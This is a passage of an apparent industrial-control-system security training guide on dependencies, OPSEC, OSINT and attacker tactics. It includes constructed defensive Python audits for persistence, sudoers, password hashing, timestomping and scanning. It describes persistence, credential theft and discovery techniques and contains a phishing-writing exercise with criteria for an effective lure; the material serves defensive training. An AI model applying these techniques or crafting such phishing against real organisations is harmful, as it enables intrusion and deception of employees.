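number of functions lost if that asset fails. All data is constructed."""
from collections import defaultdict, deque

SITE = "deer_island"  # hypothetical site name

# Asset inventory: name -> owning organization. Anything not owned by SITE
# is an external infrastructure, so relying on it is an interdependency.
ASSETS = {
    "headworks_pumps": SITE,
    "headworks_plc": SITE,
    "control_network_backbone": SITE,
    "operator_stations": SITE,
    "historian": SITE,
    "hvac_main_control": SITE,
    "remote_rtu": SITE,
    "onsite_backup_generator": SITE,
    "grid_power": "utility_power",      # energy sector (cross-sector)
    "natural_gas_feed": "utility_gas",  # natural gas sector (cross-sector)
    "cellular_wan": "telecom_carrier",  # communications sector
}

# Dependencies: asset -> the assets it needs to function. Redundancy (for
# example the generator as an alternative to grid power) is not modelled.
DEPENDS_ON = {
    "headworks_pumps": ["headworks_plc", "grid_power"],
    "headworks_plc": ["control_network_backbone", "grid_power"],
    "operator_stations": ["control_network_backbone", "grid_power", "hvac_main_control"],
    "historian": ["control_network_backbone", "grid_power"],
    "control_network_backbone": ["grid_power"],
    "hvac_main_control": ["grid_power"],
    "remote_rtu": ["cellular_wan", "grid_power"],
    "onsite_backup_generator": ["natural_gas_feed"],
    "grid_power": [],
    "natural_gas_feed": [],
    "cellular_wan": [],
}


def unknown_references():
    """Inventory check: dependencies that name an asset missing from ASSETS."""
    return sorted({d for deps in DEPENDS_ON.values() for d in deps if d not in ASSETS})


def classify_dependencies(asset):
    """Split an asset's direct dependencies by ownership: same owner is an
    intradependency, a different owner is an interdependency."""
    out = {"intradependency": [], "interdependency": []}
    for dep in DEPENDS_ON.get(asset, []):
        kind = "intradependency" if ASSETS[dep] == ASSETS[asset] else "interdependency"
        out[kind].append(dep)
    return out


def impacted_by(asset):
    """All assets that (transitively) stop functioning if `asset` fails.
    Breadth-first search over the reversed graph; the visited set keeps it
    safe on cyclic dependencies."""
    dependents = defaultdict(list)
    for a, deps in DEPENDS_ON.items():
        for d in deps:
            dependents[d].append(a)
    seen, queue = set(), deque([asset])
    while queue:
        cur = queue.popleft()
        for a in dependents[cur]:
            if a not in seen:
                seen.add(a)
                queue.append(a)
    return seen


def criticality_ranking():
    """Assets ordered by blast radius (number of impacted assets), then name."""
    rows = [(a, len(impacted_by(a))) for a in ASSETS]
    return sorted(rows, key=lambda r: (-r[1], r[0]))


def high_criticality(threshold=3):
    """Assets whose failure takes down at least `threshold` other assets: the
    'high category' to focus on. The threshold is a constructed cut-off."""
    return [a for a, n in criticality_ranking() if n >= threshold]


def external_providers():
    """Organizations the site has interdependencies on."""
    return sorted({o for o in ASSETS.values() if o != SITE})


if __name__ == "__main__":
    assert not unknown_references(), unknown_references()
    for asset, n in criticality_ranking():
        deps = classify_dependencies(asset)
        print(f"{asset:26} impacts {n:2}  inter={deps['interdependency']}")
    print("high criticality:", high_criticality())
    print("external providers:", external_providers())
```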

Use Case – Carroll County Emergency Power
Extended power outages can threaten the public’s safety, limiting their ability to heat or cool their
homes and to store and cook food. Gasoline generators are a common and reliable source of backup
power, but most people don’t store extra gasoline in case of an emergency. What would happen if,
during an emergency event, fuel service stations lost power and gasoline pumps failed?
Through a grant program, fuel stations can apply for grants that help offset the costs of purchasing
and installing portable and fixed generators, as well as backup battery units, so that people can still
get fuel for portable generators.
When the station upgrades are complete, residents will be able to secure the fuel needed to temporarily
power their homes, or even fuel their cars should the county issue an evacuation order.

Dependencies Exercises 1 and 2


Take any notes from the online activity:
Return to the learning portal and continue with the next video.

Dependencies Recap
Evaluation questions
 Which systems and their supporting infrastructure are dependent on a properly functioning
control system?
 Are multiple control systems involved?
 Are physical devices and systems within the organization inventoried?
 Are software platforms and applications within the organization inventoried?

Cybersecurity plan mapping

Common issues/findings
 Network - Connections to systems
 Physical Access – Enforcement
 Configuration - Change Management
 Network - Wireless and Radio

Step 5 – Assess Risk
to Business
Operations security (OPSEC), open-source
intelligence (OSINT), adversarial risk, MITRE
ATT&CK Framework, and risks to the supply chain

TRAINEE GUIDE

Outcomes
In this section we will discuss risk to business. This will include discussing how attackers can obtain
information to infiltrate your systems.

Learning Objective 7
Evaluate risk using OSINT and OPSEC -
Threats to ICS
 Adversaries leverage public information to develop attack
paths and techniques targeting company information
 Successful attackers learn about their targeted
organization’s security posture through profiling and
footprinting
 There is generally a TON of information that can be found
 Critical Infrastructure and control systems are increasingly
popular targets
Threat example
HMIs for a ski lift in Austria were left open on the Internet. If an attacker got hold of these HMIs, they
could control the cable tension, distance between cable cars, speed, and direction of the lifts.

The same day the Austrian ski resort closed to patch its HMIs, a “malfunction” with the same HMI and
controls vendor happened in Gudauri, Georgia. Coincidence?
ICS incidents
Below is a series showing FireEye’s ICS Key Incidents Timeline. It shows that ICSs have become
increasingly targeted over time.

In the January 2019 Worldwide Threat Assessment Report, the Director of National Intelligence calls out
specific countries as actively mapping our Nation’s critical infrastructure for the purpose of causing
substantial damage to our way of life.
Foreign adversary attacks have increased so much that on May 1, 2020, President Trump signed an
executive order and declared a state of emergency to protect the US power grid from foreign attacks.

“[Nation States are] mapping our critical infrastructure with the long-term goal of being able to cause
substantial damage.”
- DNI

They are not targeting my network. But what if they already know it better than you? What can they do?

Bowman Avenue Dam
Purpose: Kept basements from flooding in a suburban neighborhood
Details: Began operation in 2013
Sluice gate: 15 ft. wide, 2.5 ft. high
SCADA system running a modern and complex array of sensors in the brook, used to automatically
control the sluice gate and adjust the flow rate accordingly.
Specifics: Found by scanning the Internet for SCADA systems; connected via cellular modem. Attacked
by Iran’s Revolutionary Guards Corps.
The attack failed. American investigators were nevertheless disturbed because the attempt indicated that
hackers could take control of computer-operated infrastructure.

Operations security (OPSEC)
 Military origins – “Loose Lips Sink Ships”
 It is a process, NOT a set of rules
 Identify Critical Information
 Analyze threats
 Analyze vulnerabilities
 Assess risks
 Apply countermeasures
 Physical and cyber applications
 Should be part of your cybersecurity plan
 Should be integrated and synchronized throughout the organization
Identify critical information (CI)
“There’s a lot of information out there on my organization. So what? It’s just random bits of data that don’t
mean anything …”
 Data are transformed into intelligence. The operational environment / business generates data.
Patterns are identified in the data, turning it into information. Context can be added to information
to transform it into intelligence.
 What information is considered critical?
 Information about intentions, capabilities, and activities that allow an adversary to effectively
plan to disrupt operations.
 Identifying CI can be difficult.
 Bits of information are puzzle pieces
 Even your small bits help complete the picture

Identify CI (continued)
 A critical information list (CIL) can be
created to help categorize and
prioritize data.
 Customer data, passwords, network
information, device configurations,
data for analysis, etc., are examples of
critical information.
 The CIL should be fluid.
 Employees should be trained on how
to secure the items on the CIL.

 Determining what is critical
for your organization
requires a thorough
understanding of how the
organization operates.
 Ask: If available, would
this bit of information be a
risk to the success of the
organization or product or
the security of your
customers or employees?
 Check your information
sources and destinations.
Identify and document
where CI is found within
business processes.

Open-source intelligence (OSINT)
OSINT is gathering information from publicly available sources to be used in an intelligence context.
80% of all intelligence is unclassified.
There are many tools and techniques available for gathering and organizing information. We will
introduce you to a few of the tools and techniques to highlight how and what types of information can
be gathered about an organization.
 Tools and techniques:
 Social media
 Internet Archive
 Builtwith
 Robots.txt
 Scans.io / Shodan
 Maltego
 Networking tools: Nmap, nslookup, dig, etc.
 It’s not just what you put out there, but what is publicly available
about you (e.g., FCC, regulatory info, contracts)
 Antennasearch – Strava

Social media
Social media is an important piece in an organization’s OPSEC
plan. Social media users tend to be more open about their
thoughts and can end up sharing sensitive company
information. Take a few minutes to review Elliott Tessermick’s
Twitter posts (CEO of Acme).
 Open the Firefox browser
 Go to the following URL:
https://twitter.com/acmechem
 Do you see anything that may have a potential
negative impact to Elliott or Acme Inc.?
OSINT framework
OSINT framework is a collection of some of the most used
OSINT gathering tools compiled into one handy website.
 www.osintframework.com
 The Go To tool for OSINT searches
 Collection of OSINT tools
 Open-source on GitHub
Google hacking (Dorks)
Google has advanced search operators to help refine search
results. Originally created for Search Engine Optimization
(SEO) tasks, the advanced operators can return information
that is not easily found through default searches on Google.
There are approximately 30 advanced search operators
available. The list changes as Google adds or deprecates
operators.
The advanced operators enable people to find sensitive
documents, code, and even vulnerable devices and services
on the Internet. Security researcher Johnny Long brought the power of the advanced operators to light.
Long said they revealed “foolish” companies on the Internet, for which he coined the term “Google
Dorks.” The term Google Dorks, or Dorking, is now synonymous with Google Hacking.
The Google Hacking Database (GHDB) was created from Johnny Long’s project to index dorks that
apply to finding devices and security vulnerabilities. The GHDB is currently hosted by exploit-db and
is still heavily used and contributed to today. You can use these advanced operators to look for
sensitive information about your organization that may be exposed.

Physical OPSEC
Most of us are probably familiar with the “Three Gs” of physical security — gates, guards, and guns.
Gates, guards, and guns are necessary in some places, but these physical deterrents do not do much
good if proper attention is not given to them. OPSEC definitely applies to physical security as well and
should be considered by everyone in the organization.
Here are some tips on things to watch out for:
 Monitor who is entering your facilities, check
identification, and escort visitors.
 Report broken doors, windows, locks, etc.
 Inventory keys, badges, access cards, uniforms,
vehicles, etc.
 Clear workspaces of PII (personally identifiable
information) and other sensitive information that is
no longer needed.
 Perform regular walkthroughs and inspections

Hawaii Emergency Management Agency OPSEC Exercise


Take any notes from the online activity:

Return to the learning portal and continue with the next video.

If you know the enemy and know yourself, you need not fear the result of a hundred battles.
If you know yourself but not the enemy, for every victory gained you will also suffer a defeat.
If you know neither the enemy nor yourself, you will succumb in every battle.
— Sun Tzu, The Art of War

Understand your capabilities and your adversary’s. You cannot afford to ignore threats.

Threats, vulnerabilities, risk
Analyze threats
Threats come from adversaries and consider intent, capability, and
opportunity. The greater the combined intent and capability of an
adversary, the greater the threat.
Understand how you fit in the picture (you may not be the main
target, but a path to the desired target).
Keep up to date on the latest threats, hacks, and exploits, along
with trends in cyber and physical security. Use information sources
such as threat intelligence feeds, ISACs, US-CERT, InfraGard,
DNI reports, etc., to learn about threats and associated indicators.
Revisit your CIL. What is defined as CI may depend to a degree on the threats you are facing. Change
your context while reviewing the CIL.

Attack is the secret of defense; defense is the planning of an attack.


— Sun Tzu, The Art of War

Think like an adversary – know your weaknesses!


Analyze vulnerabilities
In simple terms, threat can be thought of as the strength of the adversary, and vulnerability the
weakness of an organization. Identify OPSEC indicators and compare them against the adversary’s
intelligence gathering capabilities. How would someone exploit the network, employees, or operations
to get inside and do damage? IT and OT leaders should be sure they know the network in order to
determine its potential flaws. Employees should be aware of potential social engineering attacks. Every
machine should be audited regularly to ensure it is free of spyware and malware.
Assess risk
Risk is based on the amount of harm a vulnerability may allow if exploited by an adversary, combined
with the probability of the vulnerability being exploited.
Threat Level + Vulnerability Level + Exploit Probability
The probability of compromise is greatest when the threat is very capable and dedicated, while friendly
organizations are simultaneously exposed. Threats range from low to high. Once you know what kind of
security threats you have and where your most vulnerable areas are, you can determine the risk and
what needs to be done. Analyze vulnerabilities along with available countermeasures. You can
outsource your operations, but you cannot outsource your risk!

Apply countermeasures
OPSEC planning is useless without OPSEC application. Threats are different for different
organizations, but every identified weakness or vulnerability deserves focused attention. Whether you
are implementing policy improvements or buying a new security appliance, the costs of good security
are generally far less than the costs of a breach or production outage. Doing something is better than
doing nothing.
Below are recommendations for an OPSEC Plan — the format is organization-specific; however, plans
should generally include:
 References
 General mission/program description
 Security responsibilities
 Critical information list (CIL)
 Indicators
 Threat
 Vulnerabilities
 Risk determination
 Countermeasures
 Management decision on which countermeasures to implement
 Public affairs
 Training
 Supporting units/associated programs
 Resources utilized

OPSEC, OSINT recap


Evaluation questions
 What company IP addresses, subdomains, ports, and services are externally exposed?
 What technologies, operating systems, applications, and other company infrastructure details
can be identified externally?
 Are externally facing machines regularly audited for vulnerabilities?
 Has information that is critical to your business, along with information owners, been identified
and documented on a CIL?
 What is the extent of exposed personal information? Is information such as employee names,
email addresses, social profiles, physical addresses, and phone numbers easily discovered
from an external source?
 Are badges, keys, and uniforms inventoried?
 Are facility walk downs performed?
 Are employees trained on OPSEC practices?

Cybersecurity plan mapping

Common issues/findings
Common issues/findings associated with OPSEC/OSINT include:
 Content published by the organization is not reviewed for security risks and sensitive
information
 No password policy, potentially leaving default passwords on Internet-connected devices;
passwords on sticky notes
 Social media posts revealing sensitive company information
 No governance on system deployments resulting in unidentified assets potentially open
externally
 Use of unsupported or unpatched software on external systems
 Flat network architecture and use of routable IP addresses exposing control systems externally
 Use of non-company owned devices accessing information systems
 Staff are not trained on OPSEC and cybersecurity issues
 Laptops are not protected from loss outside of the facility; no full-disk encryption
 Physical access is not monitored
 Computing equipment tossed in the trash without proper data destruction or sanitization

Learning Objective 8
Evaluate adversarial risk
Continuing on with assessing risk to the business, this section will evaluate adversarial risk.
Normally, risk assessment is a determination of quantitative or qualitative risk related to a well-defined
situation and a recognized threat based on magnitude of potential loss, and the probability that loss will
occur. However, in evaluating adversarial risk we will be looking at various ways an aggressor looks at
and traverses a victim's network to identify potential attack targets and paths to achieve their goals.
Armed with this aggressor perspective, it is easier to identify and apply appropriate mitigations to
minimize adversarial risk.

Adversarial tactics and techniques


Attackers use several tactics and techniques to initially access and then move through a network.

Initial access and execution

 Exploitation
 _______________________________________________
 _______________________________________________
 Phishing (with malicious attachment, URL, or instructions)
 ________________________________________________
 ________________________________________________
 ________________________________________________
 ________________________________________________
 Supply chain compromise – attack originates from a trusted
partner relationship (also known as island hopping)
 Insider – one who already has trusted credentials
 Compromised or brute forced credentials – easily guessed or
default password

As already noted, there are many ways to get initial access to a system. Some require user interaction,
some do not. By far the easiest way is through email phishing. A well-written phishing email message is
relatively easy to deliver but hard to defend against. The 2019 Verizon Data Breach Investigations
Report states that “the median company received over 90% of their detected malware by email.” The
report also states the “click rate” from the combined results of multiple security awareness vendors is 3%,
which means that 1 in 30 users will click on any given phishing email. Unfortunately, an aggressor only
needs one person clicking to be successful.

Phishing exercise
Review the ACME Shipping leadership bios located below. Then, bring up your
favorite email client and try to compose an effective phishing email targeting one of
Acme Shipping’s staff. After creating your phishing email, send it to ics401v@inl.gov
for feedback.
Criteria for a ‘good’ phishing email
 Sense of urgency
 Appears to come from a trusted source
 Includes information regarding something the target is involved in or passionate about
 Good grammar, proper punctuation, and NO misspellings!
 Less is more (simple can sometimes be more effective)

Acme Shipping Webpages:

Return to the learning portal and continue with the next video.

Adversarial tactics and techniques
 Account takeover / manipulation
 ________________________________
 ________________________________
 ________________________________
 Startup / logon applications and scripts
 Services
 Scheduled tasks
 Modified system files
 Directory search order hijacking
 Hidden files and directories

Persistence, or how to maintain a presence on a network.

This can be the creation of new user accounts, adding or modifying user permissions, and creating or
using remote access credentials.
Startup applications and scripts can also be used. In Linux, the rc.local, .bash_profile and .bashrc
files can be modified. In Windows, the two main locations to insert startup applications are the
"Run" and "RunOnce" registry keys. Another method for persistence is adding a scheduled task using
the Windows at.exe and schtasks.exe applications; the Linux equivalent is crontab.
Other persistence methods include adding a system service that starts automatically, modifying
common system files, or placing malware that has the same name as a system file in a directory that
is searched before the directory that contains the actual system file (directory search order
hijacking). It is also possible to "hide" files so they do not appear in normal file listings. In
Windows this is done with the attrib.exe command; in Linux you simply start the filename with a
period.
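The following audit script is an added example, not part of the course material. It checks a
constructed snapshot of a Linux host for the persistence signs just listed: commands that appear in
more than one PATH directory (directory search order hijacking), dotfiles outside an expected baseline
(hidden files), and crontab entries that run code from scratch directories (scheduled tasks). The
directory listing, the dotfile baseline, the crontab text and the scratch directory list are all
assumptions constructed for the example.

```python
"""Audit a constructed Linux host snapshot for persistence indicators:
PATH search-order shadowing, unexpected dotfiles and crontab jobs that
run out of scratch directories. All input below is constructed."""

# Constructed snapshot (not real data): directory -> files present.
LISTING = {
    "/usr/local/bin": {"ls", "backup.sh"},
    "/usr/bin": {"ls", "ps", "netstat", "python3"},
    "/bin": {"ls", "ps"},
    "/home/operator": {".bashrc", ".profile", ".cache", ".x11lock", "notes.txt"},
    "/tmp": {".X0-svc"},
}
PATH_ENTRIES = ["/usr/local/bin", "/usr/bin", "/bin"]
# Dotfiles normally expected in a home directory (constructed baseline).
BASELINE_DOTFILES = {".bashrc", ".profile", ".cache", ".bash_history", ".ssh"}
# Directories any user can write to; cron jobs pointing here deserve a look.
SCRATCH_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")

CRONTAB = """# constructed crontab, not from a real host
SHELL=/bin/sh
0 2 * * * /usr/local/bin/backup.sh
*/5 * * * * /tmp/.X0-svc >/dev/null 2>&1
@reboot /var/tmp/.cache/upd
"""


def find_path_shadowing(path_entries, listing):
    """Return {name: (winning_dir, [shadowed_dirs])} for every command that
    exists in more than one PATH directory. The earliest directory wins, so
    a planted file there hijacks the later system binary of the same name."""
    seen = {}
    for directory in path_entries:
        for name in listing.get(directory, ()):
            seen.setdefault(name, []).append(directory)
    return {n: (dirs[0], dirs[1:]) for n, dirs in seen.items() if len(dirs) > 1}


def find_unexpected_dotfiles(listing, baseline):
    """Return (directory, name) pairs for dotfiles outside the baseline."""
    hits = []
    for directory, names in listing.items():
        for name in sorted(names):
            if name.startswith(".") and name not in baseline:
                hits.append((directory, name))
    return hits


def find_scratch_cron_jobs(crontab_text):
    """Parse crontab lines into (schedule, command) and return the ones whose
    command references a scratch directory. Comments, blank lines and
    variable assignments are skipped; @reboot-style schedules are handled."""
    hits = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        if line.startswith("@"):
            fields = line.split(None, 1)
            if len(fields) < 2:
                continue
            schedule, command = fields
        else:
            fields = line.split(None, 5)
            if len(fields) < 6:
                continue
            schedule, command = " ".join(fields[:5]), fields[5]
        if any(scratch in command for scratch in SCRATCH_DIRS):
            hits.append((schedule, command))
    return hits


if __name__ == "__main__":
    for name, (winner, shadowed) in find_path_shadowing(PATH_ENTRIES, LISTING).items():
        print(f"{name}: {winner} shadows {', '.join(shadowed)}")
    for directory, name in find_unexpected_dotfiles(LISTING, BASELINE_DOTFILES):
        print(f"unexpected dotfile: {directory}/{name}")
    for schedule, command in find_scratch_cron_jobs(CRONTAB):
        print(f"cron job from scratch dir: [{schedule}] {command}")
```

On a live host the same functions would be fed from os.environ["PATH"], os.listdir() and the
output of crontab -l; the shadowing check is only meaningful if the listing includes every directory
on PATH, and a non-empty result is a lead to review rather than proof of compromise (a locally built
tool in /usr/local/bin legitimately shadows the packaged one).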

• Access token manipulation
• ___________________________________
• ___________________________________
• Crack password hashes
• ___________________________________
• ___________________________________
• Bypass user account control
• Exploit of a privileged process
• Sudo
• Keystroke logger
Privilege escalation and credential access can be accomplished in several ways.
Kerberos authentication systems (which Windows and some Linux distributions utilize) employ a key
distribution center (KDC). The KDC issues a ticket-granting ticket (TGT), which is time stamped,
encrypts that ticket using the ticket-granting service's (TGS) secret key, and returns the encrypted
result to the user's workstation. A "Golden Ticket" is a Kerberos authentication ticket for the TGT
account, a special hidden account with the job of encrypting all the authentication tokens for the
Windows Domain Controller. If an aggressor can forge a golden ticket, it can be valid for as many as
10 years.
Pass the hash is a method of authenticating to some Windows services using only a user's password
hash, which can be stolen from a user system or intercepted by monitoring network traffic.
John the Ripper is a free password hash cracking tool that runs on 15 different platforms and
combines several different password crackers into one package.
Rainbow tables are basically huge sets of precomputed tables filled with hash values that are
pre-matched to possible plaintext passwords.
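The short program below is an added illustration, not course material, of why precomputed tables
pay off against unsalted hashes and stop paying off once each stored hash has its own random salt.
SHA-256 stands in for whatever unsalted digest a weak password store uses and PBKDF2-HMAC-SHA256 is
the hardened form; the wordlist, the passwords and the iteration count are constructed assumptions.

```python
"""Precomputed-table lookup against an unsalted store versus a salted one.
Wordlist and passwords are constructed; the digest choices are assumptions."""
import hashlib
import hmac
import os

WORDLIST = ["password", "Welcome1", "plc1234", "summer2020", "Operator!"]  # constructed
ITERATIONS = 100_000  # assumption; tune to the hardware that verifies logins


def build_table(words):
    """One-time precomputation of digest -> plaintext. Without a salt the
    same table answers lookups against every user and every store, which is
    the rainbow-table principle (real tables add chain compression)."""
    return {hashlib.sha256(w.encode()).hexdigest(): w for w in words}


def lookup(table, digest_hex):
    """Recover a plaintext from the table, or None if it was never precomputed."""
    return table.get(digest_hex)


def store_unsalted(password):
    """The weak form: a bare digest of the password."""
    return hashlib.sha256(password.encode()).hexdigest()


def store_salted(password, salt=None, iterations=ITERATIONS):
    """The hardened form: (salt, digest) with a fresh 16-byte random salt per
    user, so a table would have to be rebuilt for every single user."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, digest.hex()


def verify_salted(password, salt, digest_hex, iterations=ITERATIONS):
    """Legitimate verification still works: recompute with the stored salt and
    compare in constant time."""
    _, candidate = store_salted(password, salt, iterations)
    return hmac.compare_digest(candidate, digest_hex)


if __name__ == "__main__":
    table = build_table(WORDLIST)
    print("unsalted store recovered:", lookup(table, store_unsalted("plc1234")))
    salt, digest = store_salted("plc1234")
    print("salted store recovered:", lookup(table, digest))
    print("salted login check:", verify_salted("plc1234", salt, digest))
```

The lookup against the salted digest fails not because the password is stronger but because the
precomputation no longer applies; the slow PBKDF2 iteration count separately raises the cost of
rebuilding a table per user.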
A User Account Control (UAC) bypass is when an application gains full administrative privilege through
a backdoor without triggering the UAC notice that requires the user to click the Yes button in the UAC
window.
When initially gaining access to a system, an adversary may be operating within a lower privileged
process which will prevent them from accessing certain resources on the system. Vulnerabilities may
exist, usually in operating system components and software commonly running at higher permissions,
which may be exploitable to gain higher levels of access on the system.
Sudo is a Linux command that allows a user to run a program as another user, usually the root user.
Sometimes this function is implemented without prompting for a password.
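The sudo point above is the one a reviewer can check directly in the sudoers file. The parser
below is an added example, not course material: it reads the common "user host=(runas) [TAG:]
command" rule form, skips Defaults, alias and comment lines, and reports every rule carrying the
NOPASSWD tag, rating "ALL" as unrestricted. The sudoers text is constructed, include directives are
not followed, and the severity labels are this example's own convention.

```python
"""Report sudoers rules that run commands without a password prompt.
Constructed sudoers fragment; the rule syntax handled is the common form."""
import re

SUDOERS = """# constructed sudoers fragment, not from a real host
Defaults env_reset
User_Alias ADMINS = alice, bob
root     ALL=(ALL:ALL) ALL
%admin   ALL=(ALL) ALL
operator ALL=(root) NOPASSWD: /usr/bin/systemctl restart historian
hmi      ALL=(ALL) NOPASSWD: ALL
backup   ALL=(root) NOPASSWD: /usr/local/bin/backup.sh
"""

# user  host=(runas) spec   -- runas is optional
RULE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<spec>.+)$"
)
# Tags that may prefix a command list in the spec.
TAG = re.compile(
    r"\b(?:NO)?(?:PASSWD|EXEC|SETENV|LOG_INPUT|LOG_OUTPUT|MAIL|FOLLOW|INTERCEPT):\s*"
)


def parse_sudoers(text):
    """Return one dict per user specification line."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # also drops #include lines
        if not line or line.startswith("Defaults") or "_Alias" in line.split()[0]:
            continue
        match = RULE.match(line)
        if not match:
            continue
        spec = match.group("spec")
        rules.append({
            "user": match.group("user"),
            "host": match.group("host"),
            "runas": match.group("runas") or "root",   # sudo's default target user
            "nopasswd": "NOPASSWD:" in spec,
            "commands": TAG.sub("", spec).strip(),
        })
    return rules


def nopasswd_findings(text):
    """Return (user, commands, severity) for rules that skip the password
    prompt; 'unrestricted' when the rule allows ALL commands."""
    findings = []
    for rule in parse_sudoers(text):
        if not rule["nopasswd"]:
            continue
        severity = "unrestricted" if rule["commands"] == "ALL" else "review"
        findings.append((rule["user"], rule["commands"], severity))
    return findings


if __name__ == "__main__":
    for user, commands, severity in nopasswd_findings(SUDOERS):
        print(f"{severity:13} {user:10} NOPASSWD -> {commands}")
```

A rule rated "review" is not automatically wrong (a restart of one service without a prompt is a
common ICS operator convenience), but each such command is a root-level entry point whose binary
and arguments deserve the same scrutiny as the account itself.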

A keystroke logger records keystrokes, which an attacker can examine later for usernames and
passwords.

• System tools
• Authorized user credentials
• Binary padding
• Disable security tools
• Group policy modification
• Obfuscated files or information
• Process injection
• Rootkits
• Timestomp

All system tools installed on a compromised system are available to an attacker. Tools such as DOS
commands, remote desktop, Active Directory applications, VPNs, etc. can be used without needing to
download additional tools. Stolen or aggressor-created user accounts can be leveraged to use system
tools.
Attackers may add data to files to increase the size beyond what security tools are capable of
handling, or to change the file hash to avoid hash-based blacklists.
Aggressors can also disable installed security tools (e.g., anti-virus software) to avoid possible
detection.
Aggressors may modify or add group policies to subvert access controls.
They may attempt to make an executable or file difficult to discover or analyze by encrypting,
encoding, or otherwise obfuscating its contents on the system or in transit.
Process injection is a method of executing arbitrary code in the address space of an existing process.
Running code in the context of an existing process may allow access to the process's memory,
system/network resources, and possibly elevated privileges.
Rootkits are programs that hide the existence of malware by intercepting and modifying operating
system API calls that supply system information.
Timestomping is a technique that modifies the timestamps of a file (modify, access, create, and
change times), often to mimic the dates and times of files in the same folder.
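Timestomping leaves traces a reviewer can look for. The script below is an added example, not
course material: it applies two widely used NTFS heuristics to a constructed set of file records.
Each record carries the $STANDARD_INFORMATION modified time (what most timestamp-changing tools
rewrite) and the $FILE_NAME modified time (which those tools usually leave alone). The records, the
file names and the flag names are constructed for the example.

```python
"""Heuristic timestomping review over constructed NTFS file records.
si_modified = $STANDARD_INFORMATION modified, fn_modified = $FILE_NAME
modified, both ISO-8601 with microseconds. Records are constructed."""
from datetime import datetime

FILES = [
    {"name": "notepad.exe",
     "si_modified": "2019-03-19T04:45:11.193274",
     "fn_modified": "2019-03-19T04:45:11.193274"},
    {"name": "svchost.exe",
     "si_modified": "2019-03-19T04:45:12.007118",
     "fn_modified": "2019-03-19T04:45:12.007118"},
    # constructed planted file whose mtime was set back to match its neighbours
    {"name": "srvhost.exe",
     "si_modified": "2019-03-19T04:45:11.000000",
     "fn_modified": "2021-06-02T15:03:27.481262"},
    # constructed document copied from a FAT-formatted USB stick (2 s resolution)
    {"name": "report.docx",
     "si_modified": "2021-05-30T08:12:44.000000",
     "fn_modified": "2021-05-30T08:12:44.000000"},
]


def parse(ts):
    return datetime.fromisoformat(ts)


def review_timestamps(records):
    """Return {name: [flags]} for records that trip a heuristic.

    si_before_fn:    $SI modified predates $FN modified. $FN is set when the
                     file is created or renamed and $SI on every later write,
                     so normally $SI >= $FN; the reverse is a common sign that
                     $SI was back-dated.
    zero_subseconds: $SI modified has no fractional second, typical of tools
                     that take a timestamp at whole-second precision.
    """
    findings = {}
    for record in records:
        flags = []
        si, fn = parse(record["si_modified"]), parse(record["fn_modified"])
        if si < fn:
            flags.append("si_before_fn")
        if si.microsecond == 0:
            flags.append("zero_subseconds")
        if flags:
            findings[record["name"]] = flags
    return findings


if __name__ == "__main__":
    for name, flags in review_timestamps(FILES).items():
        print(f"{name}: {', '.join(flags)}")
```

The two heuristics have different weight: the $SI/$FN inversion is hard to produce innocently,
while zero sub-seconds also occur on files copied from FAT volumes or written by some installers,
so report.docx above is a lead to discard quickly and srvhost.exe is the one to examine.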

Victim host discovery
• Domains, users, groups and credentials
• Applications and services
• Files and directories
• Network connections
• Network shares
• Screenshots
• Histories/logs
IPs and hostnames
• ARP query/scanning
• Limited port scanning
• Hostname enumeration
• DOS net view
• Domain controllers (Active Directory)
• DNS zone transfers
• DNS lookup
Pivot points

Attackers will try to enumerate domain names, users, group memberships, passwords and hashes.
This can be done by querying the local user database or a domain controller. Once the attacker has
sufficient access rights, they can create and modify accounts, move users into and out of groups,
change passwords and access network resources. If single sign-on is the only authentication method,
then the attacker can access all computing resources of a duly authorized user. Looking at network
connections gives the attacker an idea of what is accessible. Data files can be exfiltrated and
reviewed offline, and may contain valuable information. Access to email data gives the attacker
information to generate more successful phishing campaigns. Screenshots give an indication of what a
user is doing without logging onto the system. Browser and other application histories give an
indication of what resources a user accesses, and in some cases may contain credentials. Information
from network connections gives the attacker additional targets. Once the attacker gains credentials,
all the normal system tools on the host can be used by the attacker.

The Address Resolution Protocol (ARP) cache is a simple mapping of IP addresses to MAC addresses.
Each time a computer's TCP/IP stack uses ARP to determine the Media Access Control (MAC) address
for an IP address, it records the mapping in the ARP cache so that future ARP lookups go faster. By
querying the ARP cache an attacker can find additional targets on the same subnet that the attacker
may be able to compromise.
ARP scanning is a method by which an attacker sends ARP requests to all IPs on a subnet. The ARP
request is a packet sent out on the network asking the question "Who has IP x.x.x.x?", and if there
is a host on the subnet with that IP it will respond with "I have IP x.x.x.x and my MAC is
xx:xx:xx:xx:xx:xx". The first three bytes of the MAC address are assigned to the manufacturer of the
network interface, and many ARP scanners will look up the manufacturer using those first three bytes
and display it along with the IP and the MAC address. There is so much ARP traffic on a network that
most IDSs do not look at ARP traffic, and thus the attacker can get the IPs of all responding hosts
on a subnet in a matter of seconds with very little chance of being detected.
To avoid detection an attacker may do limited, very slow port scanning to find hosts running some
service, to help determine what a host is and/or what a host is used for. For example, a limited
scan for open port 445 may reveal which hosts on a subnet are Windows hosts. A limited scan for port
80 or 443 might reveal which hosts are running web services. A limited port scan on port 502 would
possibly reveal hosts running Modbus, and port 20000 normally indicates DNP.
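Both behaviours described above, the fast ARP sweep that most IDSs ignore and the slow single-port
probe, share one measurable property: one source touches many distinct destinations. The detector
below is an added example, not course material. It counts distinct destinations per source, protocol
and port inside a sliding time window over a constructed event list; the event format, the IP
addresses and the two threshold pairs are assumptions to be tuned per network.

```python
"""Flag ARP sweeps and slow single-port scans by destination fan-out per
source within a sliding time window. Events are constructed tuples; on a
real network they would come from a capture or flow log."""
from collections import Counter, defaultdict, deque


def fan_out_alerts(events, window_s, threshold):
    """events: (ts, src, proto, dport, dst) tuples.
    Returns {(src, proto, dport): peak_distinct_dsts} for every key whose
    number of distinct destinations inside some window_s span reaches
    threshold."""
    by_key = defaultdict(list)
    for ts, src, proto, dport, dst in events:
        by_key[(src, proto, dport)].append((ts, dst))
    alerts = {}
    for key, evs in by_key.items():
        evs.sort()
        window, counts, peak = deque(), Counter(), 0
        for ts, dst in evs:
            window.append((ts, dst))
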